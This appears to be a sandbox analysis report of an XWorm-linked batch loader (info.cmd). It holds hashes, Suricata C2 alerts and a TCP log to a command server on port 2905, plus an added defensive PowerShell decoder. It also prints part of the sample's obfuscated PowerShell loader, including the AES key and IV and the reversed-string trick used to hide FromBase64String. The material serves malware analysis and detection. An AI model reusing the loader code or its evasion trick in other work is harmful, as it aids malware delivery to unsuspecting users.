                            Preview:function decrypt_function($param_var){.$aes_var=[System.Security.Cryptography.Aes]::Create();.$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU=');.$aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw==');.$decryptor_var=$aes_var.CreateDecryptor();.$return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);.$decryptor_var.Dispose();.$aes_var.Dispose();.$return_var;}function decompress_function($param_var){.$liFcl=New-Object System.IO.MemoryStream(,$param_var);.$YKPPP=New-Object System.IO.MemoryStream;.$DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress);.$DrFOQ.CopyTo($YKPPP);.$DrFOQ.Dispose();.$liFcl.Dispose();.$YKPPP.Dispose();.$YKPPP.ToArray();}function execute_function($param_va
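The preview above shows the whole recovery chain the launcher feeds into PowerShell: decrypt_function is AES in CBC mode with PKCS7 padding and a hard-coded Base64 key and IV, decompress_function is a GZip inflate, and execute_function (cut off in the preview; the Yara rule name says what it does) consumes the result. The only obfuscation is cosmetic: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String written backwards, so the method name never appears as a literal. Because the key and IV are constants in the script, the embedded payloads can be recovered offline without running anything. The following is an added example, not the sample's or Joe Sandbox's code: the same decrypt and inflate steps in PowerShell 5.1, with the execute step replaced by writing the bytes to disk. The key and IV are those from the preview; the carrier-line marker, the chunk separator and the character-swap pairs are placeholders or assumptions (the preview is truncated before the part of the launcher that defines them), and the two-chunk launcher it decodes is constructed inside the script.

```powershell
# Added example (not the sample's or Joe Sandbox's code): defanged decoder for the
# AES-CBC + GZip chain in the dropped-file preview. Writes payloads out, never loads them.
# Key/IV: the Base64 constants from the preview. Marker, separator and swap table:
# placeholders, to be replaced with the values read from the full launcher script.

$KeyB64 = 'pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='   # 32 bytes -> AES-256
$IvB64  = 'kFkMa+H0Xjazq+yg0jtHMw=='                       # 16 bytes

function New-StagerAes {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String($KeyB64)      # what 'gnirtS46esaBmorF' reversed calls
    $aes.IV      = [Convert]::FromBase64String($IvB64)
    $aes
}

# decrypt_function + decompress_function: AES-CBC decrypt, then gunzip.
function Unprotect-StagerBlob {
    param([byte[]]$Cipher)
    $aes = New-StagerAes
    $dec = $aes.CreateDecryptor()
    try     { $packed = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }
    $in  = New-Object System.IO.MemoryStream(,$packed)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    $plain = $out.ToArray(); $out.Dispose()
    ,$plain
}

# Inverse chain (gzip, then AES-encrypt). Used only to build the constructed sample below.
function Protect-StagerBlob {
    param([byte[]]$Plain)
    $ms = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Compress)
    $gz.Write($Plain, 0, $Plain.Length); $gz.Dispose()
    $packed = $ms.ToArray(); $ms.Dispose()
    $aes = New-StagerAes
    $enc = $aes.CreateEncryptor()
    try     { $cipher = $enc.TransformFinalBlock($packed, 0, $packed.Length) }
    finally { $enc.Dispose(); $aes.Dispose() }
    ,$cipher
}

# Find the carrier line, undo the character swaps, Base64-decode, then decrypt and
# inflate each chunk. Nothing here executes the result.
function Get-StagerPayloads {
    param(
        [string]$Path,
        [string]$Marker,                 # prefix of the carrier line (placeholder)
        [hashtable]$Substitutions,       # swaps applied before Base64 decode (placeholder)
        [string]$Separator = '\'         # chunk separator inside the carrier line (assumption)
    )
    $carrier = Get-Content -LiteralPath $Path | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $carrier) { throw "no line starting with '$Marker' in $Path" }
    foreach ($chunk in $carrier.Substring($Marker.Length).Split($Separator)) {
        $b64 = $chunk
        foreach ($swap in $Substitutions.Keys) { $b64 = $b64.Replace($swap, $Substitutions[$swap]) }
        ,(Unprotect-StagerBlob ([Convert]::FromBase64String($b64)))
    }
}

# --- Constructed demonstration (no real payload): a fake launcher carrying two text chunks ---
$marker = 'MARKERPLACEHOLDER000'          # stands in for the real carrier prefix
$swaps  = @{ '!' = '/'; '~' = '+' }       # stands in for the stager's own swap pairs
$ascii  = [System.Text.Encoding]::ASCII
$stages = @('constructed stage 1', 'constructed stage 2') | ForEach-Object {
    $b64 = [Convert]::ToBase64String((Protect-StagerBlob ($ascii.GetBytes($_))))
    foreach ($swap in $swaps.Keys) { $b64 = $b64.Replace($swaps[$swap], $swap) }   # swaps applied in reverse
    $b64
}
$tmp = Join-Path ([IO.Path]::GetTempPath()) 'info_constructed.cmd'
Set-Content -LiteralPath $tmp -Value @('@echo off', ($marker + ($stages -join '\'))) -Encoding ASCII

$i = 0
foreach ($bytes in Get-StagerPayloads -Path $tmp -Marker $marker -Substitutions $swaps) {
    $outFile = Join-Path ([IO.Path]::GetTempPath()) ('payload{0}.bin' -f $i)
    [IO.File]::WriteAllBytes($outFile, $bytes)                 # the replacement for execute_function
    $magic = ($bytes[0..1] | ForEach-Object { '{0:X2}' -f $_ }) -join ' '
    '{0}: {1} bytes, first bytes {2} -> {3}' -f $outFile, $bytes.Length, $magic, $ascii.GetString($bytes)
    $i++
}
```

Against the real info.cmd, call Get-StagerPayloads with the marker, separator and swap pairs read from the full launcher, and check that each recovered blob starts with 4D 5A (MZ) before opening it in a .NET decompiler. The constant key and IV also make the decrypt_function line itself a usable static signature for this loader.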
                            File type:ASCII text, with very long lines (58328), with CRLF line terminators
                            Entropy (8bit):6.09259465342361
                            TrID:
                              File name:info.cmd
                              File size:82'133 bytes
                              MD5:43f3ee9c714203eeccd5503d17a36105
                              SHA1:d554becc96c1296d948382fd2ea8c1a1ad0184c8
                              SHA256:c153c05ebbf7db866984c1b21da5bfebbaedcfa5fce0cecb09a50377e0503a53
                              SHA512:f54a1bc1772bd6c6651dc2df50fa2cfca70c7bd8b89307d66e3a290aa881c7cda5176ead1b00566f54d729e68cbd57832d02580664da9a361ee1db95b5ac296d
                              SSDEEP:1536:UlFEtm9P8DRSi0ga9pZ8nS0JdX48PiZ5LU/8ZeMhRY6NP/gLl+uC:UlgROg6N0x6ZxUEXRYA/8lE
                              TLSH:248302F5C0A2940421FC5ACD587EF766E36E9AD8A366E9CEC0B5738294BC007FC55B14
                              File Content Preview:cmd /c "set __=^&rem"..set "BXeG=Lo"..set "euUW=nvo"..set "NMnM=lect"..set "qOnZ=byp"..set "KEVf=prof"..set "mDUqDELLJqYpSjTUNsic=echo function decryp"..set "gOdcDLkvtzzfybzXcNdz=t_function($param_va"..set "JjmwNYUgVslswSZyzRNR=r){.$aes_var=[System"..set
                              Icon Hash:9686878b929a9886
        Timestamp                | Protocol | SID     | Message                                                     | Source Port | Dest Port | Source IP      | Dest IP
        05/23/24-21:10:10.754109 | TCP      | 2852874 | ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2        | 2905        | 49705     | 163.172.59.233 | 192.168.2.8
        05/23/24-21:10:10.754109 | TCP      | 2852870 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes | 2905        | 49705     | 163.172.59.233 | 192.168.2.8
        05/23/24-21:07:45.319600 | TCP      | 2855924 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound     | 49705       | 2905      | 192.168.2.8    | 163.172.59.233
        05/23/24-21:08:53.440750 | TCP      | 2853193 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound     | 49705       | 2905      | 192.168.2.8    | 163.172.59.233
        Timestamp                           | Source Port | Dest Port | Source IP      | Dest IP
        May 23, 2024 21:07:31.724806070 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:07:31.743388891 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:07:31.743542910 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:07:31.854635000 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:07:31.859973907 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:07:40.795804977 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:07:40.847754002 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:07:45.319600105 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:07:45.324966908 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:07:58.785972118 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:07:58.793808937 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:10.754934072 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:10.801239967 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:12.253950119 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:12.258991003 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:25.723098040 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:25.730739117 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:39.178153038 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:39.183161020 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:40.489376068 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:40.494440079 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:40.757714033 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:40.801556110 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:40.848701954 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:40.858064890 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:42.802201033 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:42.807086945 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:45.098764896 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:45.103764057 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:47.833163977 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:47.891324997 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:48.813427925 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:48.819324970 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:48.837806940 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:48.842736006 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:50.762063026 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:50.767121077 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:51.334836006 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:51.339797020 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:51.960171938 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:51.969654083 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:52.140747070 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:52.146708012 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:52.347429037 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:52.352550030 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:52.402971983 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:52.408525944 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:52.612323999 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:52.617643118 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:52.654520035 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:52.659526110 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:52.870882988 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:52.895204067 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:52.951927900 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:53.176035881 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:53.440749884 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:53.446048021 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:53.744741917 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:53.749994993 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:54.005187988 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:54.012809038 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:54.080832958 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:54.085758924 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:54.140400887 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:54.145570993 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:54.260932922 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:54.267153025 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:54.327837944 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:54.333184004 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:55.114684105 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:55.126316071 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:55.240010023 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:55.275367975 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:55.411396980 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:55.418884993 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:57.406054020 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:57.489856005 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:57.948700905 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:57.955336094 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:57.995913029 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:58.001019001 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:58.411520958 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:58.416593075 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:59.085956097 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:59.091701031 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:59.199791908 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:59.204911947 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:08:59.809984922 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:08:59.815079927 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:00.262571096 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:00.318195105 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:00.439621925 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:00.444641113 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:00.596316099 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:00.603079081 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:00.817207098 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:00.822284937 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:00.966058969 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:00.971102953 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:03.357341051 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:03.365478039 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:04.693398952 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:04.698453903 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:04.933252096 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:04.938364029 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:05.134465933 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:05.160790920 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:05.334358931 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:05.356065989 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:05.661684990 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:05.669713020 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:07.088355064 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:07.098222971 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:07.105101109 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:07.110903025 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:08.586451054 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:08.614490032 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:08.910797119 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:08.917340040 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:09.292570114 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:09.322236061 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:09.322299957 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:09.327294111 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:09.581312895 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:09.586561918 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:09.701371908 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:09.772572994 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:09.935168982 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:09.940491915 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:10.759975910 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:10.833136082 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:12.187895060 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:12.195405960 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
        May 23, 2024 21:09:12.795305967 CEST | 49705 | 2905  | 192.168.2.8    | 163.172.59.233
        May 23, 2024 21:09:12.802720070 CEST | 2905  | 49705 | 163.172.59.233 | 192.168.2.8
                              May 23, 2024 21:09:12.861277103 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:12.866343021 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:13.402843952 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:13.630052090 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:13.764132023 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:13.769702911 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:14.063173056 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:14.068298101 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:14.647552013 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:14.654699087 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:14.698776960 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:14.704857111 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:15.099833965 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:15.104827881 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:15.928791046 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:15.961739063 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:21.975030899 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:21.980386019 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:22.951172113 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:22.956377983 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:23.687675953 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:23.692800045 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:23.837492943 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:23.842477083 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:24.642045975 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:24.647149086 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:25.399396896 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:25.404356956 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:25.876080036 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:25.881160975 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:27.044800043 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:27.049906015 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:27.743442059 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:27.749847889 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:27.981261015 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:27.986602068 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:29.345531940 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:29.350889921 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:29.986196995 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:29.991405964 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:30.108613968 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:30.113686085 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:31.213965893 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:31.219685078 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:31.612751007 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:31.617916107 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:31.848844051 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:31.853913069 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:32.443705082 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:32.448909998 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:33.260560036 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:33.265669107 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:33.278317928 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:33.283226967 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:35.223913908 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:35.229175091 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:35.723927021 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:35.730645895 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:36.253072977 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:36.258426905 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:37.463468075 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:37.472801924 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:37.752651930 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:37.760289907 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:38.366952896 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:38.372041941 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:38.463326931 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:38.472687006 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:39.471919060 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:39.478029013 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:40.753585100 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:40.927249908 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:40.937267065 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:40.981503963 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:41.452553988 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:41.457681894 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:42.147870064 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:42.153779984 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:43.094599962 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:43.099819899 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:45.202255964 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:45.209551096 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:46.145442009 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:46.150876045 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:46.320286989 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:46.326010942 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:48.142513990 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:48.148485899 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:48.499505997 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:48.505027056 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:50.160835028 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:50.166121960 CEST290549705163.172.59.233192.168.2.8
